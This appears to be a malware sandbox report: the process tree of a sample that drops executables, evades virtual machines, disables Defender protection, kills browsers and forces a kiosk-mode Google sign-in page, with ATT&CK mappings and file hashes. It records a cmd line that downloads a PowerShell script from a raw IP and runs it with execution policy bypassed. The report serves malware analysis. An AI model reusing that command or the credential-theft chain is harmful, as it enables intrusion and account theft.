C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,9747215450497580339,10125871448995702397,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3372 /prefetch:15⤵
- Uses browser remote debugging
PID:880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4652,i,9747215450497580339,10125871448995702397,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4708 /prefetch:15⤵
- Uses browser remote debugging
PID:4960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,9747215450497580339,10125871448995702397,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4780 /prefetch:85⤵PID:1660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,9747215450497580339,10125871448995702397,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4680 /prefetch:85⤵PID:2776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5016,i,9747215450497580339,10125871448995702397,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5032 /prefetch:85⤵PID:2044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,9747215450497580339,10125871448995702397,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4988 /prefetch:85⤵PID:1164
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3972 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd9e6c46f8,0x7ffd9e6c4708,0x7ffd9e6c47185⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:25⤵PID:1792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:3892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2468 /prefetch:25⤵PID:3276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2648 /prefetch:25⤵PID:3212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 /prefetch:85⤵PID:2176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2796 /prefetch:25⤵PID:3168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3328 /prefetch:25⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3492 /prefetch:25⤵PID:3512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:15⤵
- Uses browser remote debugging
PID:3492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:15⤵
- Uses browser remote debugging
PID:632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3488 /prefetch:25⤵PID:4612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3116 /prefetch:25⤵PID:3208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,5942711414303228097,1573168162541242367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3448 /prefetch:25⤵PID:1152
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 21284⤵
- Program crash
PID:1280
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4p222w.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4p222w.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3608 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\1003922001\067dcb623b.exe"C:\Users\Admin\AppData\Local\Temp\1003922001\067dcb623b.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:632
-
-
C:\Users\Admin\AppData\Local\Temp\1003923001\99db4eccbd.exe"C:\Users\Admin\AppData\Local\Temp\1003923001\99db4eccbd.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:976
-
-
C:\Users\Admin\AppData\Local\Temp\1003924001\a0b3eb8bf9.exe"C:\Users\Admin\AppData\Local\Temp\1003924001\a0b3eb8bf9.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:924 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:1636
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:624 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1928 -parentBuildID 20240401114208 -prefsHandle 1972 -prefMapHandle 1964 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1421a267-ccbd-40a7-b913-7b429d6499fd} 624 "\\.\pipe\gecko-crash-server-pipe.624" gpu7⤵PID:5080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2492 -parentBuildID 20240401114208 -prefsHandle 2468 -prefMapHandle 2464 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08267eb6-15de-49cc-82e7-c91d81aa332d} 624 "\\.\pipe\gecko-crash-server-pipe.624" socket7⤵PID:4824
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3156 -childID 1 -isForBrowser -prefsHandle 3184 -prefMapHandle 2764 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {837fef7e-c945-452e-b4d2-ee49ba1d8958} 624 "\\.\pipe\gecko-crash-server-pipe.624" tab7⤵PID:1672
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3432 -childID 2 -isForBrowser -prefsHandle 3424 -prefMapHandle 3008 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {931847e1-3dbb-4dec-8479-0cea3c689b7e} 624 "\\.\pipe\gecko-crash-server-pipe.624" tab7⤵PID:1144
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4828 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4820 -prefMapHandle 4812 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f44847cc-7e3d-4f70-994e-5c03b7edeaaa} 624 "\\.\pipe\gecko-crash-server-pipe.624" utility7⤵
- Checks processor information in registry
PID:6344
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5392 -childID 3 -isForBrowser -prefsHandle 4988 -prefMapHandle 5384 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1a0700e-170f-418c-b610-16bd0eb3e5d6} 624 "\\.\pipe\gecko-crash-server-pipe.624" tab7⤵PID:5524
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5712 -childID 4 -isForBrowser -prefsHandle 5632 -prefMapHandle 5636 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {34f2796f-84d6-46bb-91af-bd4891627ef5} 624 "\\.\pipe\gecko-crash-server-pipe.624" tab7⤵PID:5508
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5904 -childID 5 -isForBrowser -prefsHandle 5824 -prefMapHandle 5828 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6db75d57-067f-4ccf-8614-332b89eaa2d6} 624 "\\.\pipe\gecko-crash-server-pipe.624" tab7⤵PID:5588
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003925001\19c7e02c42.exe"C:\Users\Admin\AppData\Local\Temp\1003925001\19c7e02c42.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Users\Admin\AppData\Local\Temp\1003926001\chromedriver.exe"C:\Users\Admin\AppData\Local\Temp\1003926001\chromedriver.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -o C:\Users\Admin\AppData\Local\Temp\script.ps1 http://139.99.3.47/P.ps1 & powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps15⤵
- System Location Discovery: System Language Discovery
PID:6368 -
C:\Windows\SysWOW64\curl.execurl -o C:\Users\Admin\AppData\Local\Temp\script.ps1 http://139.99.3.47/P.ps16⤵PID:6456
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps16⤵
- Blocklisted process makes network request
- Looks for VMWare Tools registry key
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6516
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2632 -ip 26321⤵PID:2888
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6156
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2520
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Modify Authentication Process
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Authentication Process
1Modify Registry
3Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
676KB
MD5eda18948a989176f4eebb175ce806255
SHA1ff22a3d5f5fb705137f233c36622c79eab995897
SHA25681a4f37c5495800b7cc46aea6535d9180dadb5c151db6f1fd1968d1cd8c1eeb4
SHA512160ed9990c37a4753fc0f5111c94414568654afbedc05308308197df2a99594f2d5d8fe511fd2279543a869ed20248e603d88a0b9b8fb119e8e6131b0c52ff85
-
Filesize
649B
MD58d0e76d3c00717d3676759a89b934447
SHA1c5ebfb3f1b152f97d8e46f197e7dd10c68bdfc50
SHA256e986269cc433754df094fcaf43fb91195d83947981caef3d5796284ab8176b92
SHA5125f5bcbdc89648aea61bef76d1fd7f36ca221366df6fdf9e8a6cdda3bf8875ce17eae8e6e11a8ed7b0d58bbcdfeb5e9ee1910b58f19cc441d49051797a3e24ccb
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1ca4ea64-2105-4634-86be-2baea78e203a.dmp
Filesize10.5MB
MD51a82319b3f02fcaa2b8118b867bc7249
SHA11f4ae2c9e435032fae7fcb6c3af8acc954973dae
SHA2569f0299c089a2bcefeeb888959639e450bddcddd9d40604c8e80bbbc2cc8fe35f
SHA512411097673a9cbf12a610a8951287e6513385bab988ba417e222826ea0c81c0b078819dfba7ace1629ad6c1f7463e509e639c2afbf5053743737fe2b815418009
-
Filesize
152B
MD5e55832d7cd7e868a2c087c4c73678018
SHA1ed7a2f6d6437e907218ffba9128802eaf414a0eb
SHA256a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574
SHA512897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f
-
Filesize
152B
MD5c2d9eeb3fdd75834f0ac3f9767de8d6f
SHA14d16a7e82190f8490a00008bd53d85fb92e379b0
SHA2561e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66
SHA512d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd
-
Filesize
5KB
MD552219377c5e675886279b18079b341a9
SHA145dfde2c609c12f2b0359914b66834a23543d0bc
SHA256b8d0ef1377b37561ee39762f86d1ca702633ea70f0ae5f827e68cec44077a2fd
SHA512bcb2cc85e87b7724957c7a9914983398c3e6505d18322ea53f9e7c1aa2479311f40ad7c6a99c332519aa10f2663712c6a6a7340d403d60a6cdfbd7da266dea71
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\activity-stream.discovery_stream.json.tmp
Filesize18KB
MD590a3a0a81c162ed7e278040cd60ec7dc
SHA199a4ff683849d14986254351bd685a3a693813fb
SHA25698fe94722b2701408ed4ca5604aac780f96f7d1506207de969d9d5401bfde2ae
SHA512a4876f14a1436defde9f539c204aabb947d304153942adc6997afb6210175102c992e081b112453e8e9e28421b8b2b815eb443fefd3c74c826ce1ca4982cd95d
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\cache2\entries\D500AD994A7515157BB2A6ADD5B18B754E4D2F99
Filesize13KB
MD584112f8dd0185886686afc228a5d9453
SHA1ffbd2966ec2efdad7d157c586cf7aa259e6b9d26
SHA256112b76134c23c343a64ae26aa923fba0528cf06a14f62a2bc38dd896d11cf3ea
SHA51266e78605ec4e0b0ed3e2c37d8cc4f5143622789400615c08a26d4ba2e736c0a0b692ea58d72764a993ab5d9b8de8c53683d3bd3938719073540aa80652256bd0
-
Filesize
898KB
MD51457784f97d654dfd7d73c4cad6ea9f2
SHA18c25f13fda185e4483a16875cd7aae12d72218cc
SHA256fd33b5db9287f300da950c3e33b68e23c1f4af6cccaef2cc2f438d9fd14cd0ae
SHA512bf0768ba7c5640ba6217900757e0f922ce37c599dd029aea0c03f627dc5ce2b71c0c099ab05c32d7c0dbecd9e170a42f5b429b690abea1765493ee21a6b8d72d
-
Filesize
2.7MB
MD5e7b10ceb762ed99e7ad95e5b05374251
SHA1bf0476b8cf97b5daebe824eaebec44068d5db670
